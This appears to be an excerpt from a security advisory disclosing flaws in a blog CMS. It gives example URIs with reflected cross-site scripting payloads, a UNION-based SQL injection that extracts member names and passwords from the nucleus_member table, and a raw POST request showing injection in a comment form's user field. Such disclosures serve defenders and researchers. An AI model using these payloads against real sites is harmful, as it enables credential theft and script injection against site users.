The following example URIs demonstrate cross-site scripting and SQL-injection
attacks:

http://www.example.com/index.php?query=asd&blogid=1,1)+union+select+1,2,user(),database(),mname,6,7,8,9,10,11,mpassword,13,14,15+from+nucleus_member/*
http://www.example.com/photo/admin.php/"><script>alert('DSECRG_XSS')</script> 
http://www.example.com/photo/index.php/"><script>alert('DSECRG_XSS')</script>
http://www.example.com/index.php?query=asd&amount=0&blogid=1'<script>alert('DSecRG_XSS')</script>;&x=34&y=6
http://www.example.com/admin/plugins/table/index.php?action=edittemplate&field=title'<script>a=/DSecRG XSS/%0d%0aalert(a.source)</script>&id=2&text=0


The following POST request demonstrates an SQL-injection issue:

POST /blogcms/action.php HTTP/1.0
Cookie: DokuWiki=g8m41hncjkfjkc4sb1lvmgbiu5
Content-Length: 139
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; DS; .NET CLR 2.0.50727)
Host: 192.168.40.33
Pragma: no-cache
Connection: Keep-Alive

action=addcomment&url=http%3A%2F%2F192.168.40.33%2Fblogcms%2F%3Fitem%3Dblog-cms-4-2-1&itemid=1&body=asd&&userid=asd&x=42&y=13&user=asd'+[DSecRG_INJECTION]